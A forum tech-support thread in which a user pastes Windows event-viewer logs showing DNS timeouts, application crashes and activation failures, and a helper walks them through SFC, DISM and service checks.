The browser service was unable to retrieve a list of servers from the browser master \\DESKTOP-VV6LMNU on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\DESKTOP-VV6LMNU  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 25/11/2019 19:22:09
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 25/11/2019 19:18:34
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name detectportal.firefox.com timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 25/11/2019 19:17:27
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name detectportal.firefox.com timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 25/11/2019 19:17:25
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name detectportal.firefox.com timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 25/11/2019 19:01:32
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name mail.yahoo.com timed out after none of the configured DNS servers responded.

Log: 'System' Date/Time: 25/11/2019 19:01:03
Type: Warning Category: 0
Event: 4231 Source: Tcpip
A request to allocate an ephemeral port number from the global TCP port space has failed due to all such ports being in use.

Log: 'System' Date/Time: 25/11/2019 16:39:59
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 25/11/2019 11:10:26
Type: Warning Category: 0
Event: 8021 Source: BROWSER
The browser service was unable to retrieve a list of servers from the browser master \\MIXPC on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\MIXPC  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 25/11/2019 10:53:59
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 24/11/2019 23:38:26
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.
_____________________________________________

 

VEW second reult (Application):

 

Vino's Event Viewer v01c run on Windows 7 in English
Report run at 26/11/2019 18:09:28

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 26/11/2019 15:48:44
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 15:48:11
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 11:50:28
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 11:49:59
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 11:40:02
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 11:39:32
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 11:38:51
Type: Error Category: 100
Event: 1000 Source: Application Error
Faulting application name: reaper_host32.exe, version: 0.0.0.0, time stamp: 0x5dd47f93 Faulting module name: QuickTime.qts, version: 7.79.80.95, time stamp: 0x5668a2c5 Exception code: 0xc0000005 Fault offset: 0x0001aed4 Faulting process id: 0x3f60 Faulting application start time: 0x01d5a43fe7d74f43 Faulting application path: C:\Program Files\REAPER (x64)\Plugins\reaper_host32.exe Faulting module path: C:\Program Files (x86)\QuickTime\QTSystem\QuickTime.qts Report Id: 4fe66871-8230-48aa-ab8d-ff6dcf8419f1 Faulting package full name:  Faulting package-relative application ID:

Log: 'Application' Date/Time: 26/11/2019 10:49:35
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 07:38:59
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 26/11/2019 07:38:29
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 19:22:36
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 19:22:05
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 16:40:34
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 16:40:03
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 15:59:34
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 15:51:31
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 15:33:49
Type: Error Category: 100
Event: 1000 Source: Application Error
Faulting application name: reaper_host32.exe, version: 0.0.0.0, time stamp: 0x5dd47f93 Faulting module name: QuickTime.qts, version: 7.79.80.95, time stamp: 0x5668a2c5 Exception code: 0xc0000005 Fault offset: 0x0001aed4 Faulting process id: 0x4758 Faulting application start time: 0x01d5a39f77446ce6 Faulting application path: C:\Program Files\REAPER (x64)\Plugins\reaper_host32.exe Faulting module path: C:\Program Files (x86)\QuickTime\QTSystem\QuickTime.qts Report Id: 4a3bc0ce-a993-49e0-923d-f66090644848 Faulting package full name:  Faulting package-relative application ID:

Log: 'Application' Date/Time: 25/11/2019 15:12:10
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Log: 'Application' Date/Time: 25/11/2019 14:46:32
Type: Error Category: 100
Event: 1000 Source: Application Error
Faulting application name: reaper_host32.exe, version: 0.0.0.0, time stamp: 0x5dd47f93 Faulting module name: QuickTime.qts, version: 7.79.80.95, time stamp: 0x5668a2c5 Exception code: 0xc0000005 Fault offset: 0x0001aed4 Faulting process id: 0x266c Faulting application start time: 0x01d5a39cb2d4865b Faulting application path: C:\Program Files\REAPER (x64)\Plugins\reaper_host32.exe Faulting module path: C:\Program Files (x86)\QuickTime\QTSystem\QuickTime.qts Report Id: e798a86e-d820-481a-b7ea-b5bc0e3be195 Faulting package full name:  Faulting package-relative application ID:

Log: 'Application' Date/Time: 25/11/2019 14:29:08
Type: Error Category: 0
Event: 78 Source: SideBySide
Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 26/11/2019 15:48:18
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 15:48:15
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

Log: 'Application' Date/Time: 26/11/2019 13:40:38
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 13:40:30
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 11:49:59
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

Log: 'Application' Date/Time: 26/11/2019 11:49:53
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 11:39:34
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

Log: 'Application' Date/Time: 26/11/2019 11:39:27
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 07:38:40
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 07:38:37
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 26/11/2019 07:38:34
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(2)

Log: 'Application' Date/Time: 25/11/2019 19:22:12
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 19:22:10
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

Log: 'Application' Date/Time: 25/11/2019 19:18:34
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 19:17:24
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 19:17:19
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007267C AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 19:17:17
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007267C AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 16:40:02
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

Log: 'Application' Date/Time: 25/11/2019 16:39:57
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=NetworkAvailable

Log: 'Application' Date/Time: 25/11/2019 10:54:05
Type: Warning Category: 0
Event: 8233 Source: Microsoft-Windows-Security-SPP
The rules engine reported a failed VL activation attempt. Reason:0x8007007B AppId = 0ff1ce15-a989-479d-af46-f275c6370663, SkuId = d450596f-894d-49e0-966a-fd39ed4c4c64 Trigger=UserLogon(1)

 


  • 0

#14
RKinner

RKinner

    Malware Expert

  • Expert
  • 22,034 posts
  • MVP

Continuing is fine.  Try Dism again after running SFC and rebooting.  If it still fails with 1060:

 

The error


    1060 (0x424)

    The specified service does not exist as an installed service.

Search for services.msc

hit Enter

 

This should open the Services window.  Do you see

 

Background Tasks Infrastructure Service Running  Automatic

 

and

 

Windows Update  Running  Manual Triggered

 

There is a dism log at C:\windows\logs\DISM\dism.log

 

Copy and paste or attach it.

 

If you have trouble seeing it tell windows to let you see hidden files:

 

http://www.howtogeek...-windows-vista/
 


  • 0

#15
spra

spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

I re-tried DISM and it stopped again at the same point with the message you described.

Then in Services I see the first one
Background Tasks Infrastructure Service Running  Automatic
but nothing like
Windows Update  Running  Manual Triggered
Instead I see
Windows Update Medic Service .... not running Manual.

 

The DISM log is too big to upload. It is 12.910 Kb. This is the message I get, even after enabling flash 9.
I am not sure that I will be able to copy it here either, because when I tried before, the app seemed to hang.
I will try, in my next reply, but if it fails what should I do?
 


  • 0






Similar Topics

2 user(s) are reading this topic

0 members, 2 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP